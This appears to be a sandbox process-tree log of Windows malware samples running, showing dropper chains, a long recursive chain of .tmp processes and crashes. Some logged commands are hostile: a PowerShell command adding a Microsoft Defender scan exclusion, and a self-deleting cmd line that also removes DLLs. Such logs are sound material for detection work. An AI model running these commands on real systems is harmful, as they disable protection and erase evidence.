C:\Users\Admin\AppData\Local\Temp\D59A.tmp"C:\Users\Admin\AppData\Local\Temp\D59A.tmp"204⤵PID:6988
-
C:\Users\Admin\AppData\Local\Temp\D646.tmp"C:\Users\Admin\AppData\Local\Temp\D646.tmp"205⤵PID:7736
-
C:\Users\Admin\AppData\Local\Temp\D6F2.tmp"C:\Users\Admin\AppData\Local\Temp\D6F2.tmp"206⤵PID:3008
-
C:\Users\Admin\AppData\Local\Temp\D78E.tmp"C:\Users\Admin\AppData\Local\Temp\D78E.tmp"207⤵PID:1104
-
C:\Users\Admin\AppData\Local\Temp\D81B.tmp"C:\Users\Admin\AppData\Local\Temp\D81B.tmp"208⤵PID:4324
-
C:\Users\Admin\AppData\Local\Temp\D8B7.tmp"C:\Users\Admin\AppData\Local\Temp\D8B7.tmp"209⤵PID:5972
-
C:\Users\Admin\AppData\Local\Temp\D943.tmp"C:\Users\Admin\AppData\Local\Temp\D943.tmp"210⤵PID:4508
-
C:\Users\Admin\AppData\Local\Temp\D9D0.tmp"C:\Users\Admin\AppData\Local\Temp\D9D0.tmp"211⤵PID:7660
-
C:\Users\Admin\AppData\Local\Temp\DA4D.tmp"C:\Users\Admin\AppData\Local\Temp\DA4D.tmp"212⤵PID:184
-
C:\Users\Admin\AppData\Local\Temp\DADA.tmp"C:\Users\Admin\AppData\Local\Temp\DADA.tmp"213⤵PID:5348
-
C:\Users\Admin\AppData\Local\Temp\DBC4.tmp"C:\Users\Admin\AppData\Local\Temp\DBC4.tmp"214⤵PID:2012
-
C:\Users\Admin\AppData\Local\Temp\DC51.tmp"C:\Users\Admin\AppData\Local\Temp\DC51.tmp"215⤵PID:5172
-
C:\Users\Admin\AppData\Local\Temp\DCED.tmp"C:\Users\Admin\AppData\Local\Temp\DCED.tmp"216⤵PID:1848
-
C:\Users\Admin\AppData\Local\Temp\DDB8.tmp"C:\Users\Admin\AppData\Local\Temp\DDB8.tmp"217⤵PID:5732
-
C:\Users\Admin\AppData\Local\Temp\DF00.tmp"C:\Users\Admin\AppData\Local\Temp\DF00.tmp"218⤵PID:3996
-
C:\Users\Admin\AppData\Local\Temp\E029.tmp"C:\Users\Admin\AppData\Local\Temp\E029.tmp"219⤵PID:3052
-
C:\Users\Admin\AppData\Local\Temp\E23C.tmp"C:\Users\Admin\AppData\Local\Temp\E23C.tmp"220⤵PID:4484
-
C:\Users\Admin\AppData\Local\Temp\F835.tmp"C:\Users\Admin\AppData\Local\Temp\F835.tmp"221⤵PID:4016
-
C:\Users\Admin\AppData\Local\Temp\FB71.tmp"C:\Users\Admin\AppData\Local\Temp\FB71.tmp"222⤵PID:7908
-
C:\Users\Admin\AppData\Local\Temp\82.tmp"C:\Users\Admin\AppData\Local\Temp\82.tmp"223⤵PID:4056
-
C:\Users\Admin\AppData\Local\Temp\322.tmp"C:\Users\Admin\AppData\Local\Temp\322.tmp"224⤵PID:544
-
C:\Users\Admin\AppData\Local\Temp\6EB.tmp"C:\Users\Admin\AppData\Local\Temp\6EB.tmp"225⤵PID:5944
-
C:\Users\Admin\AppData\Local\Temp\99A.tmp"C:\Users\Admin\AppData\Local\Temp\99A.tmp"226⤵PID:7804
-
C:\Users\Admin\AppData\Local\Temp\BFC.tmp"C:\Users\Admin\AppData\Local\Temp\BFC.tmp"227⤵PID:6392
-
C:\Users\Admin\AppData\Local\Temp\EBB.tmp"C:\Users\Admin\AppData\Local\Temp\EBB.tmp"228⤵PID:1368
-
C:\Users\Admin\AppData\Local\Temp\10DE.tmp"C:\Users\Admin\AppData\Local\Temp\10DE.tmp"229⤵PID:6272
-
C:\Users\Admin\AppData\Local\Temp\1439.tmp"C:\Users\Admin\AppData\Local\Temp\1439.tmp"230⤵PID:5788
-
C:\Users\Admin\AppData\Local\Temp\1718.tmp"C:\Users\Admin\AppData\Local\Temp\1718.tmp"231⤵PID:6860
-
C:\Users\Admin\AppData\Local\Temp\7zS4CAC9473\Wed229b547fcc29c9.exeWed229b547fcc29c9.exe209⤵PID:6712
-
C:\Users\Admin\AppData\Local\Temp\7zS4CAC9473\Wed226cd1d832.exeWed226cd1d832.exe206⤵PID:7412
-
C:\Users\Admin\AppData\Local\Temp\7zS4CAC9473\Wed226cd1d832.exe"C:\Users\Admin\AppData\Local\Temp\7zS4CAC9473\Wed226cd1d832.exe" -u207⤵PID:3812
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"200⤵PID:5196
-
C:\Users\Admin\AppData\Local\Temp\7zS4CAC9473\Wed2293645fc7348.exeWed2293645fc7348.exe113⤵PID:7024
-
C:\Users\Admin\AppData\Local\Temp\7zS4CAC9473\Wed22e828d4ce.exeWed22e828d4ce.exe25⤵PID:5888
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 4540 -ip 45401⤵PID:4036
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 5884 -ip 58841⤵PID:5584
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 4540 -ip 45401⤵PID:4308
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 5884 -ip 58841⤵PID:1800
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 4540 -ip 45401⤵PID:5964
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 5884 -ip 58841⤵PID:7580
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 596 -p 4540 -ip 45401⤵PID:3576
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 5884 -ip 58841⤵PID:2264
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 5884 -ip 58841⤵PID:7884
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 5884 -ip 58841⤵PID:5468
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 5884 -ip 58841⤵PID:7164
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 5884 -ip 58841⤵PID:3996
-
C:\Users\Admin\Desktop\Malware\74bafd56c1fb3cdebf0a63de4ffb6f16dc1d5cee38e11ab0d2bc2614538da65f.exe"C:\Users\Admin\Desktop\Malware\74bafd56c1fb3cdebf0a63de4ffb6f16dc1d5cee38e11ab0d2bc2614538da65f.exe"1⤵PID:6436
-
C:\Users\Admin\AppData\Local\Temp\setup.exe"C:\Users\Admin\AppData\Local\Temp\setup.exe"2⤵PID:3152
-
C:\Users\Admin\AppData\Local\Temp\7zS05CDE292\setup_install.exe"C:\Users\Admin\AppData\Local\Temp\7zS05CDE292\setup_install.exe"3⤵PID:4628
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\d4a28e6e7c345f2fe12.exe4⤵PID:5340
-
C:\Users\Admin\AppData\Local\Temp\d4a28e6e7c345f2fe12.exeC:\Users\Admin\AppData\Local\Temp\d4a28e6e7c345f2fe12.exe5⤵PID:6852
-
C:\Users\Admin\AppData\Local\Temp\7zS4CAC9473\setup_install.exe"C:\Users\Admin\AppData\Local\Temp\7zS4CAC9473\setup_install.exe"6⤵PID:5584
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"7⤵PID:6772
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"8⤵PID:4904
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed228bde576b67b7445.exe7⤵PID:6176
-
C:\Users\Admin\AppData\Local\Temp\7zS4CAC9473\Wed228bde576b67b7445.exeWed228bde576b67b7445.exe8⤵PID:7892
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5584 -s 5647⤵
- Program crash
PID:4572 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed22e828d4ce.exe7⤵PID:772
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed229b547fcc29c9.exe7⤵PID:4324
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed22c4d5fca264fa5df.exe7⤵PID:5868
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed22d1525a0017.exe7⤵PID:5848
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed22f19243a34ff2.exe7⤵PID:3808
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed223a477901b3292.exe7⤵PID:5984
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed2293645fc7348.exe7⤵PID:7924
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed226cd1d832.exe7⤵PID:7736
-
C:\Users\Admin\Desktop\Malware\23c81c824177bc39dc8131bb8c25661ffecf0026501a7d074b49ff0eabc10b25.exe"C:\Users\Admin\Desktop\Malware\23c81c824177bc39dc8131bb8c25661ffecf0026501a7d074b49ff0eabc10b25.exe"1⤵PID:5128
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"2⤵PID:7368
-
C:\Users\Admin\Desktop\Malware\18f74890fef60f1e18d5b1d0b43f100c69b430445187d672bbedf46aff687d09.exe"C:\Users\Admin\Desktop\Malware\18f74890fef60f1e18d5b1d0b43f100c69b430445187d672bbedf46aff687d09.exe"1⤵PID:5532
-
C:\Users\Admin\AppData\Local\Temp\setup.exe"C:\Users\Admin\AppData\Local\Temp\setup.exe"2⤵PID:2952
-
C:\Users\Admin\AppData\Local\Temp\7zS88B00C82\setup_install.exe"C:\Users\Admin\AppData\Local\Temp\7zS88B00C82\setup_install.exe"3⤵PID:6544
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\d4a28e6e7c345f2fe12.exe4⤵PID:5256
-
C:\Users\Admin\Desktop\Malware\61a764045daabe15243e13405d418e3f60b6671ee7a1e325c6021204920f741c.exe"C:\Users\Admin\Desktop\Malware\61a764045daabe15243e13405d418e3f60b6671ee7a1e325c6021204920f741c.exe"1⤵PID:7428
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\Admin\Desktop\Malware\61a764045daabe15243e13405d418e3f60b6671ee7a1e325c6021204920f741c.exe" & del "C:\ProgramData\*.dll"" & exit2⤵PID:6096
-
C:\Windows\SysWOW64\timeout.exetimeout /t 53⤵
- Delays execution with timeout.exe
PID:2756 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7428 -s 24362⤵
- Program crash
PID:6336
-
C:\Users\Admin\Desktop\Malware\56e26fd1b4bb65afbfccfcd02b594270030f800f0270068d00c3eb6c31553323.exe"C:\Users\Admin\Desktop\Malware\56e26fd1b4bb65afbfccfcd02b594270030f800f0270068d00c3eb6c31553323.exe"1⤵PID:5688
-
C:\Users\Admin\Desktop\Malware\31e7e054709f5b627f50b6b26f95c6e0536c7d03361c16c9677c70fe327a7181.exe"C:\Users\Admin\Desktop\Malware\31e7e054709f5b627f50b6b26f95c6e0536c7d03361c16c9677c70fe327a7181.exe"1⤵PID:8140
-
C:\Users\Admin\AppData\Local\Temp\d4a28e6e7c345f2fe12.exeC:\Users\Admin\AppData\Local\Temp\d4a28e6e7c345f2fe12.exe1⤵PID:3904
-
C:\Users\Admin\AppData\Local\Temp\7zS04FA3A63\setup_install.exe"C:\Users\Admin\AppData\Local\Temp\7zS04FA3A63\setup_install.exe"2⤵PID:7280
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed228bde576b67b7445.exe3⤵PID:7116
-
C:\Users\Admin\AppData\Local\Temp\7zS04FA3A63\Wed228bde576b67b7445.exeWed228bde576b67b7445.exe4⤵PID:5128
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed22e828d4ce.exe3⤵PID:6480
-
C:\Users\Admin\AppData\Local\Temp\7zS04FA3A63\Wed22e828d4ce.exeWed22e828d4ce.exe4⤵PID:6624
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed229b547fcc29c9.exe3⤵PID:7884
-
C:\Users\Admin\AppData\Local\Temp\7zS04FA3A63\Wed229b547fcc29c9.exeWed229b547fcc29c9.exe4⤵PID:4116
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed22c4d5fca264fa5df.exe3⤵PID:4504
-
C:\Users\Admin\AppData\Local\Temp\7zS04FA3A63\Wed22c4d5fca264fa5df.exeWed22c4d5fca264fa5df.exe4⤵PID:7680
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7280 -s 5003⤵
- Program crash
PID:7508 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed22d1525a0017.exe3⤵PID:7608
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed22f19243a34ff2.exe3⤵PID:6044
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed223a477901b3292.exe3⤵PID:5456
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed2293645fc7348.exe3⤵PID:7012
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed226cd1d832.exe3⤵PID:6896
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"3⤵PID:652
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 604 -p 7280 -ip 72801⤵PID:5544
-
C:\Users\Admin\AppData\Local\Temp\7zS4CAC9473\Wed22d1525a0017.exeWed22d1525a0017.exe1⤵PID:5404
-
C:\Users\Admin\AppData\Local\Temp\is-MH188.tmp\Wed22d1525a0017.tmp"C:\Users\Admin\AppData\Local\Temp\is-MH188.tmp\Wed22d1525a0017.tmp" /SL5="$5071E,506086,422400,C:\Users\Admin\AppData\Local\Temp\7zS4CAC9473\Wed22d1525a0017.exe"2⤵PID:5164
-
C:\Users\Admin\AppData\Local\Temp\7zS04FA3A63\Wed226cd1d832.exeWed226cd1d832.exe1⤵PID:3448
-
C:\Users\Admin\AppData\Local\Temp\7zS04FA3A63\Wed226cd1d832.exe"C:\Users\Admin\AppData\Local\Temp\7zS04FA3A63\Wed226cd1d832.exe" -u2⤵PID:6136
-
C:\Users\Admin\AppData\Local\Temp\19C7.tmp"C:\Users\Admin\AppData\Local\Temp\19C7.tmp"1⤵PID:6484
-
C:\Users\Admin\AppData\Local\Temp\1F26.tmp"C:\Users\Admin\AppData\Local\Temp\1F26.tmp"2⤵PID:3800
-
C:\Users\Admin\AppData\Local\Temp\2AA0.tmp"C:\Users\Admin\AppData\Local\Temp\2AA0.tmp"3⤵PID:6720
-
C:\Users\Admin\AppData\Local\Temp\38D8.tmp"C:\Users\Admin\AppData\Local\Temp\38D8.tmp"4⤵PID:6048
-
C:\Users\Admin\AppData\Local\Temp\4675.tmp"C:\Users\Admin\AppData\Local\Temp\4675.tmp"5⤵PID:6936
-
C:\Users\Admin\AppData\Local\Temp\5058.tmp"C:\Users\Admin\AppData\Local\Temp\5058.tmp"6⤵PID:3800
-
C:\Users\Admin\AppData\Local\Temp\59BE.tmp"C:\Users\Admin\AppData\Local\Temp\59BE.tmp"7⤵PID:5380
-
C:\Users\Admin\AppData\Local\Temp\63EF.tmp"C:\Users\Admin\AppData\Local\Temp\63EF.tmp"8⤵PID:1696
-
C:\Users\Admin\AppData\Local\Temp\6B04.tmp"C:\Users\Admin\AppData\Local\Temp\6B04.tmp"9⤵PID:516
-
C:\Users\Admin\AppData\Local\Temp\7005.tmp"C:\Users\Admin\AppData\Local\Temp\7005.tmp"10⤵PID:5796
-
C:\Users\Admin\AppData\Local\Temp\7749.tmp"C:\Users\Admin\AppData\Local\Temp\7749.tmp"11⤵PID:7764
-
C:\Users\Admin\AppData\Local\Temp\810D.tmp"C:\Users\Admin\AppData\Local\Temp\810D.tmp"12⤵PID:4800
-
C:\Users\Admin\AppData\Local\Temp\868B.tmp"C:\Users\Admin\AppData\Local\Temp\868B.tmp"13⤵PID:1628
-
C:\Users\Admin\AppData\Local\Temp\8969.tmp"C:\Users\Admin\AppData\Local\Temp\8969.tmp"14⤵PID:7248
-
C:\Users\Admin\AppData\Local\Temp\8D03.tmp"C:\Users\Admin\AppData\Local\Temp\8D03.tmp"15⤵PID:6660
-
C:\Users\Admin\AppData\Local\Temp\9512.tmp"C:\Users\Admin\AppData\Local\Temp\9512.tmp"16⤵PID:3732
-
C:\Users\Admin\AppData\Local\Temp\99A5.tmp"C:\Users\Admin\AppData\Local\Temp\99A5.tmp"17⤵PID:3800
-
C:\Users\Admin\AppData\Local\Temp\9BD8.tmp"C:\Users\Admin\AppData\Local\Temp\9BD8.tmp"18⤵PID:6712
-
C:\Users\Admin\AppData\Local\Temp\9D10.tmp"C:\Users\Admin\AppData\Local\Temp\9D10.tmp"19⤵PID:6096
-
C:\Users\Admin\AppData\Local\Temp\9EC6.tmp"C:\Users\Admin\AppData\Local\Temp\9EC6.tmp"20⤵PID:4324
-
C:\Users\Admin\AppData\Local\Temp\A1B4.tmp"C:\Users\Admin\AppData\Local\Temp\A1B4.tmp"21⤵PID:5212
-
C:\Users\Admin\AppData\Local\Temp\A4E0.tmp"C:\Users\Admin\AppData\Local\Temp\A4E0.tmp"22⤵PID:2012
-
C:\Users\Admin\AppData\Local\Temp\A742.tmp"C:\Users\Admin\AppData\Local\Temp\A742.tmp"23⤵PID:8112
-
C:\Users\Admin\AppData\Local\Temp\A8A9.tmp"C:\Users\Admin\AppData\Local\Temp\A8A9.tmp"24⤵PID:3912
-
C:\Users\Admin\AppData\Local\Temp\AA01.tmp"C:\Users\Admin\AppData\Local\Temp\AA01.tmp"25⤵PID:5968
-
C:\Users\Admin\AppData\Local\Temp\AB39.tmp"C:\Users\Admin\AppData\Local\Temp\AB39.tmp"26⤵PID:7480
-
C:\Users\Admin\AppData\Local\Temp\AC91.tmp"C:\Users\Admin\AppData\Local\Temp\AC91.tmp"27⤵PID:4376
-
C:\Users\Admin\AppData\Local\Temp\AD9B.tmp"C:\Users\Admin\AppData\Local\Temp\AD9B.tmp"28⤵PID:5088
-
C:\Users\Admin\AppData\Local\Temp\AE85.tmp"C:\Users\Admin\AppData\Local\Temp\AE85.tmp"29⤵PID:1612
-
C:\Users\Admin\AppData\Local\Temp\AF50.tmp"C:\Users\Admin\AppData\Local\Temp\AF50.tmp"30⤵PID:1776
-
C:\Users\Admin\AppData\Local\Temp\AFFC.tmp"C:\Users\Admin\AppData\Local\Temp\AFFC.tmp"31⤵PID:5544
-
C:\Users\Admin\AppData\Local\Temp\B27D.tmp"C:\Users\Admin\AppData\Local\Temp\B27D.tmp"32⤵PID:2652
-
C:\Users\Admin\AppData\Local\Temp\B3B5.tmp"C:\Users\Admin\AppData\Local\Temp\B3B5.tmp"33⤵PID:5012
-
C:\Users\Admin\AppData\Local\Temp\B4A0.tmp"C:\Users\Admin\AppData\Local\Temp\B4A0.tmp"34⤵PID:3440
-
C:\Users\Admin\AppData\Local\Temp\B694.tmp"C:\Users\Admin\AppData\Local\Temp\B694.tmp"35⤵PID:5972
-
C:\Users\Admin\AppData\Local\Temp\B8A7.tmp"C:\Users\Admin\AppData\Local\Temp\B8A7.tmp"36⤵PID:3944
-
C:\Users\Admin\AppData\Local\Temp\B9FF.tmp"C:\Users\Admin\AppData\Local\Temp\B9FF.tmp"37⤵PID:2468
-
C:\Users\Admin\AppData\Local\Temp\BB66.tmp"C:\Users\Admin\AppData\Local\Temp\BB66.tmp"38⤵PID:5924
-
C:\Users\Admin\AppData\Local\Temp\BCED.tmp"C:\Users\Admin\AppData\Local\Temp\BCED.tmp"39⤵PID:5344
-
C:\Users\Admin\AppData\Local\Temp\BE54.tmp"C:\Users\Admin\AppData\Local\Temp\BE54.tmp"40⤵PID:7668
-
C:\Users\Admin\AppData\Local\Temp\C0A6.tmp"C:\Users\Admin\AppData\Local\Temp\C0A6.tmp"41⤵PID:3808
-
C:\Users\Admin\AppData\Local\Temp\C29A.tmp"C:\Users\Admin\AppData\Local\Temp\C29A.tmp"42⤵PID:1800
-
C:\Users\Admin\AppData\Local\Temp\C634.tmp"C:\Users\Admin\AppData\Local\Temp\C634.tmp"43⤵PID:4440
-
C:\Users\Admin\AppData\Local\Temp\CA5A.tmp"C:\Users\Admin\AppData\Local\Temp\CA5A.tmp"44⤵PID:6172
-
C:\Users\Admin\AppData\Local\Temp\CB54.tmp"C:\Users\Admin\AppData\Local\Temp\CB54.tmp"45⤵PID:5616
-
C:\Users\Admin\AppData\Local\Temp\CCFA.tmp"C:\Users\Admin\AppData\Local\Temp\CCFA.tmp"46⤵PID:2208
-
C:\Users\Admin\AppData\Local\Temp\CF3C.tmp"C:\Users\Admin\AppData\Local\Temp\CF3C.tmp"47⤵PID:7504
-
C:\Users\Admin\AppData\Local\Temp\D084.tmp"C:\Users\Admin\AppData\Local\Temp\D084.tmp"48⤵PID:1608
-
C:\Users\Admin\AppData\Local\Temp\D324.tmp"C:\Users\Admin\AppData\Local\Temp\D324.tmp"49⤵PID:4572
-
C:\Users\Admin\AppData\Local\Temp\D48C.tmp"C:\Users\Admin\AppData\Local\Temp\D48C.tmp"50⤵PID:6056
-
C:\Users\Admin\AppData\Local\Temp\D547.tmp"C:\Users\Admin\AppData\Local\Temp\D547.tmp"51⤵PID:7632
-
C:\Users\Admin\AppData\Local\Temp\D641.tmp"C:\Users\Admin\AppData\Local\Temp\D641.tmp"52⤵PID:516
-
C:\Users\Admin\AppData\Local\Temp\D7A8.tmp"C:\Users\Admin\AppData\Local\Temp\D7A8.tmp"53⤵PID:5340
-
C:\Users\Admin\AppData\Local\Temp\D8A2.tmp"C:\Users\Admin\AppData\Local\Temp\D8A2.tmp"54⤵PID:2456
-
C:\Users\Admin\AppData\Local\Temp\D99C.tmp"C:\Users\Admin\AppData\Local\Temp\D99C.tmp"55⤵PID:3272
-
C:\Users\Admin\AppData\Local\Temp\DA96.tmp"C:\Users\Admin\AppData\Local\Temp\DA96.tmp"56⤵PID:7276
-
C:\Users\Admin\AppData\Local\Temp\DBDF.tmp"C:\Users\Admin\AppData\Local\Temp\DBDF.tmp"57⤵PID:2688
-
C:\Users\Admin\AppData\Local\Temp\DE01.tmp"C:\Users\Admin\AppData\Local\Temp\DE01.tmp"58⤵PID:4344
-
C:\Users\Admin\AppData\Local\Temp\DFA7.tmp"C:\Users\Admin\AppData\Local\Temp\DFA7.tmp"59⤵PID:3668
-
C:\Users\Admin\AppData\Local\Temp\E0EF.tmp"C:\Users\Admin\AppData\Local\Temp\E0EF.tmp"60⤵PID:7776
-
C:\Users\Admin\AppData\Local\Temp\E1BB.tmp"C:\Users\Admin\AppData\Local\Temp\E1BB.tmp"61⤵PID:5528
-
C:\Users\Admin\AppData\Local\Temp\E286.tmp"C:\Users\Admin\AppData\Local\Temp\E286.tmp"62⤵PID:7764
-
C:\Users\Admin\AppData\Local\Temp\E312.tmp"C:\Users\Admin\AppData\Local\Temp\E312.tmp"63⤵PID:3912
-
C:\Users\Admin\AppData\Local\Temp\E41C.tmp"C:\Users\Admin\AppData\Local\Temp\E41C.tmp"64⤵PID:224
-
C:\Users\Admin\AppData\Local\Temp\E4F7.tmp"C:\Users\Admin\AppData\Local\Temp\E4F7.tmp"65⤵PID:4040
-
C:\Users\Admin\AppData\Local\Temp\E5E1.tmp"C:\Users\Admin\AppData\Local\Temp\E5E1.tmp"66⤵PID:1416
-
C:\Users\Admin\AppData\Local\Temp\E6CB.tmp"C:\Users\Admin\AppData\Local\Temp\E6CB.tmp"67⤵PID:368
-
C:\Users\Admin\AppData\Local\Temp\E7A6.tmp"C:\Users\Admin\AppData\Local\Temp\E7A6.tmp"68⤵PID:100
-
C:\Users\Admin\AppData\Local\Temp\E95C.tmp"C:\Users\Admin\AppData\Local\Temp\E95C.tmp"69⤵PID:7480
-
C:\Users\Admin\AppData\Local\Temp\EAC3.tmp"C:\Users\Admin\AppData\Local\Temp\EAC3.tmp"70⤵PID:5976
-
C:\Users\Admin\AppData\Local\Temp\EB6F.tmp"C:\Users\Admin\AppData\Local\Temp\EB6F.tmp"71⤵PID:1456
-
C:\Users\Admin\AppData\Local\Temp\EC2A.tmp"C:\Users\Admin\AppData\Local\Temp\EC2A.tmp"72⤵PID:6436
-
C:\Users\Admin\AppData\Local\Temp\ED73.tmp"C:\Users\Admin\AppData\Local\Temp\ED73.tmp"73⤵PID:7308
-
C:\Users\Admin\AppData\Local\Temp\EE1E.tmp"C:\Users\Admin\AppData\Local\Temp\EE1E.tmp"74⤵PID:3244
-
C:\Users\Admin\AppData\Local\Temp\EEBB.tmp"C:\Users\Admin\AppData\Local\Temp\EEBB.tmp"75⤵PID:3556
-
C:\Users\Admin\AppData\Local\Temp\EFB5.tmp"C:\Users\Admin\AppData\Local\Temp\EFB5.tmp"76⤵PID:7852
-
C:\Users\Admin\AppData\Local\Temp\F0CE.tmp"C:\Users\Admin\AppData\Local\Temp\F0CE.tmp"77⤵PID:7512
-
C:\Users\Admin\AppData\Local\Temp\F2B2.tmp"C:\Users\Admin\AppData\Local\Temp\F2B2.tmp"78⤵PID:7252
-
C:\Users\Admin\AppData\Local\Temp\F3CC.tmp"C:\Users\Admin\AppData\Local\Temp\F3CC.tmp"79⤵PID:7840
-
C:\Users\Admin\AppData\Local\Temp\F468.tmp"C:\Users\Admin\AppData\Local\Temp\F468.tmp"80⤵PID:7500
-
C:\Users\Admin\AppData\Local\Temp\F523.tmp"C:\Users\Admin\AppData\Local\Temp\F523.tmp"81⤵PID:3552
-
C:\Users\Admin\AppData\Local\Temp\F5C0.tmp"C:\Users\Admin\AppData\Local\Temp\F5C0.tmp"82⤵PID:6060
-
C:\Users\Admin\AppData\Local\Temp\F65C.tmp"C:\Users\Admin\AppData\Local\Temp\F65C.tmp"83⤵PID:7392
-
C:\Users\Admin\AppData\Local\Temp\F765.tmp"C:\Users\Admin\AppData\Local\Temp\F765.tmp"84⤵PID:7956
-
C:\Users\Admin\AppData\Local\Temp\F85F.tmp"C:\Users\Admin\AppData\Local\Temp\F85F.tmp"85⤵PID:5160
-
C:\Users\Admin\AppData\Local\Temp\F969.tmp"C:\Users\Admin\AppData\Local\Temp\F969.tmp"86⤵PID:5036
-
C:\Users\Admin\AppData\Local\Temp\F9F6.tmp"C:\Users\Admin\AppData\Local\Temp\F9F6.tmp"87⤵PID:5568
-
C:\Users\Admin\AppData\Local\Temp\FAB1.tmp"C:\Users\Admin\AppData\Local\Temp\FAB1.tmp"88⤵PID:2780
-
C:\Users\Admin\AppData\Local\Temp\FBCA.tmp"C:\Users\Admin\AppData\Local\Temp\FBCA.tmp"89⤵PID:7036
-
C:\Users\Admin\AppData\Local\Temp\FCD4.tmp"C:\Users\Admin\AppData\Local\Temp\FCD4.tmp"90⤵PID:4760
-
C:\Users\Admin\AppData\Local\Temp\FDBE.tmp"C:\Users\Admin\AppData\Local\Temp\FDBE.tmp"91⤵PID:7040
-
C:\Users\Admin\AppData\Local\Temp\FEA9.tmp"C:\Users\Admin\AppData\Local\Temp\FEA9.tmp"92⤵PID:6852
-
C:\Users\Admin\AppData\Local\Temp\FFA3.tmp"C:\Users\Admin\AppData\Local\Temp\FFA3.tmp"93⤵PID:5892
-
C:\Users\Admin\AppData\Local\Temp\9D.tmp"C:\Users\Admin\AppData\Local\Temp\9D.tmp"94⤵PID:5328
-
C:\Users\Admin\AppData\Local\Temp\129.tmp"C:\Users\Admin\AppData\Local\Temp\129.tmp"95⤵PID:6104
-
C:\Users\Admin\AppData\Local\Temp\1F5.tmp"C:\Users\Admin\AppData\Local\Temp\1F5.tmp"96⤵PID:6564
-
C:\Users\Admin\AppData\Local\Temp\291.tmp"C:\Users\Admin\AppData\Local\Temp\291.tmp"97⤵PID:2952
-
C:\Users\Admin\AppData\Local\Temp\39A.tmp"C:\Users\Admin\AppData\Local\Temp\39A.tmp"98⤵PID:5744
-
C:\Users\Admin\AppData\Local\Temp\475.tmp"C:\Users\Admin\AppData\Local\Temp\475.tmp"99⤵PID:1136
-
C:\Users\Admin\AppData\Local\Temp\502.tmp"C:\Users\Admin\AppData\Local\Temp\502.tmp"100⤵PID:5680
-
C:\Users\Admin\AppData\Local\Temp\5EC.tmp"C:\Users\Admin\AppData\Local\Temp\5EC.tmp"101⤵PID:4816
-
C:\Users\Admin\AppData\Local\Temp\6A8.tmp"C:\Users\Admin\AppData\Local\Temp\6A8.tmp"102⤵PID:3808
-
